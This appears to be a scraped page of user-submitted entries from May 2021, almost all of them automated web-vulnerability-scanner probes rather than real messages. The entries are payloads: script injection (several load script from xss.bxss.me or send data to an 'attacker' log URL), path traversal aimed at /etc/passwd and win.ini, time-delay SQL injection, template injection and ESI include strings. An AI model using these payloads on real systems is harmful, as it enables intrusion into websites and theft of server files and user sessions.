 • pHqghUme

  2021-05-05 23:30:24


  1


 • pHqghUme

  2021-05-05 23:30:23


  ${9999358+9999603}


 • ${9999946+9999821}

  2021-05-05 23:30:22


  1


 • eEZNSVFjN3o=

  2021-05-05 23:30:22


  1


 • pHqghUme

  2021-05-05 23:30:20


  1


 • pHqghUme

  2021-05-05 23:30:19


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-05 23:30:18


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-05 23:30:17


  1


 • pHqghUme

  2021-05-05 23:30:16


  1


 • pHqghUme<input autofocus onfocus=93nd(9583)>

  2021-05-05 23:30:16


  1


 • pHqghUme

  2021-05-05 23:30:15


  FBDSZi1G


 • pHqghUme

  2021-05-05 23:30:15


  1


 • pHqghUme

  2021-05-05 23:30:14


  1


 • pHqghUme&lt;ScRiPt&gt;oCqE(9367)&lt;/sCripT&gt;

  2021-05-05 23:30:14


  1


 • kDfrc6Wm

  2021-05-05 23:30:13


  1


 • pHqghUme

  2021-05-05 23:30:12


  1


 • pHqghUme

  2021-05-05 23:30:02


  ../1


 • pHqghUme

  2021-05-05 23:30:01


  1


 • pHqghUme

  2021-05-05 23:30:00


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-05 23:30:00


  1


 • pHqghUme

  2021-05-05 23:29:59


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-05 23:29:59


  1


 • ../pHqghUme

  2021-05-05 23:29:58


  1


 • pHqghUme

  2021-05-05 23:29:58


  1


 • pHqghUme

  2021-05-05 23:29:57


  1


 • pHqghUme

  2021-05-05 23:29:57


  1


 • pHqghUme

  2021-05-05 23:29:57


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-05 23:29:56


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-05 23:29:55


  1


 • pHqghUme

  2021-05-05 23:29:54


  1


 • pHqghUme

  2021-05-05 23:29:53


  1


 • pHqghUme

  2021-05-05 23:29:51


  1


 • pHqghUme

  2021-05-05 23:29:50


  1


 • pHqghUme

  2021-05-05 23:29:50


  1


 • pHqghUme

  2021-05-05 23:29:48


  1


 • pHqghUme

  2021-05-05 23:29:47


  1&lt;ScRiPt&gt;ReVh(9020)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-05 23:29:44


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9263'>


 • pHqghUme

  2021-05-05 23:29:42


  1


 • pHqghUme

  2021-05-05 23:29:41


  1


 • pHqghUme\u003CScRiPt\oCqE(9023)\u003C/sCripT\u003E

  2021-05-05 23:29:38


  1


 • pHqghUme

  2021-05-05 23:29:37


  1


 • pHqghUme

  2021-05-05 23:29:37


  "+response.write(9556790*9387277)+"


 • pHqghUme

  2021-05-05 23:29:36


  '+response.write(9556790*9387277)+'


 • pHqghUme

  2021-05-05 23:29:35


  response.write(9556790*9387277)


 • "+response.write(9329712*9544376)+"

  2021-05-05 23:29:34


  1


 • '+response.write(9329712*9544376)+'

  2021-05-05 23:29:33


  1


 • pHqghUme&lt;ScRiPt&gt;93nd(9252)&lt;/sCripT&gt;

  2021-05-05 23:29:32


  1


 • response.write(9329712*9544376)

  2021-05-05 23:29:32


  1


 • pHqghUme

  2021-05-05 23:29:31


  1


 • pHqghUme

  2021-05-05 23:29:27


  1


 • pHqghUme

  2021-05-05 23:29:24


  1


 • pHqghUme

  2021-05-05 23:29:23


  1


 • pHqghUme

  2021-05-05 23:29:21


  1<isindex type=image src=1 onerror=c63w(9386)>


 • pHqghUme

  2021-05-05 23:29:21


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%6F%43%71%45%289642%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-05 23:29:20


  1


 • pHqghUme

  2021-05-05 23:29:20


  1


 • pHqghUme\u003CScRiPt\93nd(9615)\u003C/sCripT\u003E

  2021-05-05 23:29:20


  1


 • pHqghUme

  2021-05-05 23:29:18


  1\u003CScRiPt\ReVh(9131)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-05 23:29:10


  1


 • pHqghUme

  2021-05-05 23:29:08


  1dy39lnNO


 • 1Dy5MynSO

  2021-05-05 23:29:07


  1


 • pHqghUme

  2021-05-05 23:29:06


  1


 • pHqghUme

  2021-05-05 23:29:05


  1


 • pHqghUme

  2021-05-05 23:28:58


  %31%3C%53%63%52%69%50%74%20%3E%52%65%56%68%289158%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme<img/src=">" onerror=alert(9860)>

  2021-05-05 23:28:54


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%39%33%6E%64%289217%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-05 23:28:51


  1


 • pHqghUme

  2021-05-05 23:28:40


  1<img/src=">" onerror=alert(9413)>


 • pHqghUme

  2021-05-05 23:28:35


  1


 • pHqghUme

  2021-05-05 23:28:27


  1<ScRiPt >c63w(9095)</ScRiPt>


 • pHqghUme

  2021-05-05 23:28:11


  1<img src=xyz OnErRor=ReVh(9578)>


 • pHqghUme

  2021-05-05 23:28:08


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9898></ScRiPt>


 • pHqghUme<img/src=">" onerror=alert(9538)>

  2021-05-05 23:28:06


  1


 • pHqghUme<img src=xyz OnErRor=oCqE(9479)>

  2021-05-05 23:28:02


  1


 • pHqghUme

  2021-05-05 23:27:44


  1<img src=//xss.bxss.me/t/dot.gif onload=ReVh(9868)>


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=oCqE(9875)>

  2021-05-05 23:27:34


  1


 • pHqghUme<img src=xyz OnErRor=93nd(9994)>

  2021-05-05 23:27:33


  1


 • pHqghUme

  2021-05-05 23:27:13


  1<ScRiPt >c63w(9032)</ScRiPt>


 • pHqghUme

  2021-05-05 23:27:11


  1<body onload=ReVh(9380)>


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=93nd(9897)>

  2021-05-05 23:27:08


  1


 • pHqghUme<body onload=oCqE(9670)>

  2021-05-05 23:26:50


  1


 • pHqghUme<body onload=93nd(9653)>

  2021-05-05 23:26:36


  1


 • pHqghUme

  2021-05-05 23:26:28


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9274'>


 • pHqghUme

  2021-05-05 23:26:26


  1<ScR<ScRiPt>IpT>c63w(9761)</sCr<ScRiPt>IpT>


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9640'>

  2021-05-05 23:26:25


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9005'>

  2021-05-05 23:26:16


  1


 • pHqghUme

  2021-05-05 23:26:07


  1<isindex type=image src=1 onerror=ReVh(9684)>


 • pHqghUme<isindex type=image src=1 onerror=93nd(9229)>

  2021-05-05 23:25:56


  1


 • pHqghUme

  2021-05-05 23:25:50


  1<script>c63w(9543)</script>


 • pHqghUme<isindex type=image src=1 onerror=oCqE(9091)>

  2021-05-05 23:25:23


  1


 • pHqghUme

  2021-05-05 23:25:14


  1<ScRiPt >ReVh(9510)</ScRiPt>


 • pHqghUme<ScRiPt >93nd(9439)</ScRiPt>

  2021-05-05 23:25:04


  1


 • pHqghUme

  2021-05-05 23:25:03


  1<WJIQSO>DXSWO[!+!]</WJIQSO>


 • pHqghUme

  2021-05-05 23:24:57


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9401></ScRiPt>


 • pHqghUme<ScRiPt >oCqE(9382)</ScRiPt>

  2021-05-05 23:24:31


  1


 • pHqghUme

  2021-05-05 23:24:26


  1<ScRiPt >c63w(9969)</ScRiPt>


 • pHqghUme

  2021-05-05 23:24:19


  1<ScRiPt >ReVh(9565)</ScRiPt>


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9166></ScRiPt>

  2021-05-05 23:24:18


  1


 • pHqghUme<ScRiPt >93nd(9707)</ScRiPt>

  2021-05-05 23:24:01


  1


 • pHqghUme

  2021-05-05 23:23:53


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme<ScRiPt >oCqE(9931)</ScRiPt>

  2021-05-05 23:23:50


  1


 • pHqghUme<ScR<ScRiPt>IpT>93nd(9102)</sCr<ScRiPt>IpT>

  2021-05-05 23:23:48


  1


 • pHqghUme

  2021-05-05 23:23:42


  1<ScR<ScRiPt>IpT>ReVh(9877)</sCr<ScRiPt>IpT>


 • pHqghUme<ScR<ScRiPt>IpT>oCqE(9267)</sCr<ScRiPt>IpT>

  2021-05-05 23:23:37


  1


 • pHqghUme

  2021-05-05 23:23:22


  1<script>ReVh(9092)</script>


 • pHqghUme<script>93nd(9819)</script>

  2021-05-05 23:23:16


  1


 • pHqghUme

  2021-05-05 23:23:12


  acx__${98991*97996}__::.x


 • pHqghUme<script>oCqE(9805)</script>

  2021-05-05 23:23:11


  1


 • pHqghUme

  2021-05-05 23:23:04


  1<WOLQAC>XARF5[!+!]</WOLQAC>


 • pHqghUme<WRCWIV>1PLDI[!+!]</WRCWIV>

  2021-05-05 23:22:55


  1


 • pHqghUme

  2021-05-05 23:22:41


  1<ScRiPt >ReVh(9012)</ScRiPt>


 • pHqghUme<ScRiPt >oCqE(9827)</ScRiPt>

  2021-05-05 23:22:20


  1


 • pHqghUme<WE2GKY>SAEF0[!+!]</WE2GKY>

  2021-05-05 23:22:17


  1


 • pHqghUme

  2021-05-05 23:22:16


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-05 23:22:13


  acx[[${98991*97996}]]xca


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-05 23:22:05


  1


 • pHqghUme<ScRiPt >93nd(9590)</ScRiPt>

  2021-05-05 23:22:02


  1


 • pHqghUme

  2021-05-05 23:22:01


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-05 23:21:47


  acx{{98991*97996}}xca


 • acx__${98991*97996}__::.x

  2021-05-05 23:21:39


  1


 • pHqghUme

  2021-05-05 23:21:15


  acx[[${98991*97996}]]xca


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-05 23:21:12


  1


 • acx[[${98991*97996}]]xca

  2021-05-05 23:21:11


  1


 • pHqghUme

  2021-05-05 23:21:07


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • acx__${98991*97996}__::.x

  2021-05-05 23:20:56


  1


 • acx[[${98991*97996}]]xca

  2021-05-05 23:20:48


  1


 • acx{{98991*97996}}xca

  2021-05-05 23:20:42


  1


 • acx{{98991*97996}}xca

  2021-05-05 23:20:36


  1


 • pHqghUme

  2021-05-05 23:20:36


  acx{{98991*97996}}xca


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-05 23:20:23


  1


 • pHqghUme

  2021-05-05 23:20:17


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-05 23:20:13


  <th:t="${acx}#foreach


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-05 23:20:06


  1


 • pHqghUme

  2021-05-05 23:19:57


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-05 23:19:54


  <%={{={@{#{${acx}}%>


 • <th:t="${acx}#foreach

  2021-05-05 23:19:46


  1


 • <th:t="${acx}#foreach

  2021-05-05 23:19:40


  1


 • pHqghUme

  2021-05-05 23:19:22


  <%={{={@{#{${acx}}%>


 • <%={{={@{#{${acx}}%>

  2021-05-05 23:19:20


  1


 • <%={{={@{#{${acx}}%>

  2021-05-05 23:19:16


  1


 • acu8263<s1﹥s2ʺs3ʹuca8263

  2021-05-05 23:18:48


  1


 • acu3011<s1﹥s2ʺs3ʹuca3011

  2021-05-05 23:18:48


  1


 • pHqghUme

  2021-05-05 23:18:45


  acu3882<s1﹥s2ʺs3ʹuca3882


 • pHqghUme

  2021-05-05 23:18:45


  acu6001<s1﹥s2ʺs3ʹuca6001


 • pHqghUme

  2021-05-05 23:18:29


  19265247


 • pHqghUme9018590

  2021-05-05 23:18:27


  1


 • pHqghUme9254710

  2021-05-05 23:18:26


  1


 • pHqghUme

  2021-05-05 23:18:22


  19751190


 • pHqghUme

  2021-05-05 23:18:13


  '"()&%<acx><ScRiPt >ReVh(9722)</ScRiPt>


 • '"()&%<acx><ScRiPt >oCqE(9957)</ScRiPt>

  2021-05-05 23:18:11


  1


 • '"()&%<acx><ScRiPt >93nd(9455)</ScRiPt>

  2021-05-05 23:18:09


  1


 • pHqghUme

  2021-05-05 23:18:07


  '"()&%<acx><ScRiPt >c63w(9986)</ScRiPt>


 • pHqghUme'"()&%<acx><ScRiPt >93nd(9903)</ScRiPt>

  2021-05-05 23:17:54


  1


 • pHqghUme

  2021-05-05 23:17:53


  1'"()&%<acx><ScRiPt >ReVh(9542)</ScRiPt>


 • pHqghUme

  2021-05-05 23:17:49


  1'"()&%<acx><ScRiPt >c63w(9209)</ScRiPt>


 • pHqghUme'"()&%<acx><ScRiPt >oCqE(9310)</ScRiPt>

  2021-05-05 23:17:48


  1


 • pHqghUme

  2021-05-05 21:08:48


  1<e6fTJT<


 • pHqghUme

  2021-05-05 21:08:41


  1<img sRc='http://attacker-9497/log.php?


 • pHqghUme

  2021-05-05 21:08:36


  1<PlCnsW x=9645>


 • pHqghUme

  2021-05-05 21:08:33


  @@5x0Gd


 • pHqghUme

  2021-05-05 21:08:30


  1<ifRAme sRc=9957.com></IfRamE>


 • pHqghUme

  2021-05-05 21:08:29


  1'"


 • pHqghUme

  2021-05-05 21:08:28


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-05 21:08:25


  1<W593AG>JBMR8[!+!]</W593AG>


 • pHqghUme

  2021-05-05 21:08:21


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-05 21:08:20


  1fItdY <ScRiPt >G7vX(9920)</ScRiPt>


 • pHqghUme

  2021-05-05 21:08:15


  1<% contenteditable onresize=G7vX(9201)>


 • pHqghUme

  2021-05-05 21:08:15


  187lbMCY')) OR 939=(SELECT 939 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 21:08:10


  1}body{acu:Expre/**/SSion(G7vX(9697))}


 • pHqghUme

  2021-05-05 21:08:08


  OZarEqOu') OR 931=(SELECT 931 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 21:08:03


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-05 21:08:01


  3SzlOBBT' OR 437=(SELECT 437 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 21:07:58


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-05 21:07:55


  -1)) OR 591=(SELECT 591 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 21:07:53


  1<input autofocus onfocus=G7vX(9668)>


 • pHqghUme

  2021-05-05 21:07:48


  -5) OR 421=(SELECT 421 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 21:07:45


  1&lt;ScRiPt&gt;G7vX(9469)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-05 21:07:43


  -5 OR 210=(SELECT 210 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 21:07:40


  M4RL8bSa'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 21:07:39


  1\u003CScRiPt\G7vX(9466)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-05 21:07:33


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 21:07:31


  %31%3C%53%63%52%69%50%74%20%3E%47%37%76%58%289951%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-05 21:07:28


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 21:07:25


  1<img/src=">" onerror=alert(9636)>


 • pHqghUme

  2021-05-05 21:07:21


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 21:07:20


  1<img src=xyz OnErRor=G7vX(9571)>


 • pHqghUme

  2021-05-05 21:07:14


  1<img src=//xss.bxss.me/t/dot.gif onload=G7vX(9524)>


 • pHqghUme

  2021-05-05 21:07:12


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-05 21:07:09


  1<body onload=G7vX(9614)>


 • pHqghUme

  2021-05-05 21:07:05


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-05 21:07:03


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9036'>


 • pHqghUme

  2021-05-05 21:06:58


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-05 21:06:58


  1<isindex type=image src=1 onerror=G7vX(9929)>


 • pHqghUme

  2021-05-05 21:06:50


  if(now()=sysdate(),sleep(15),0)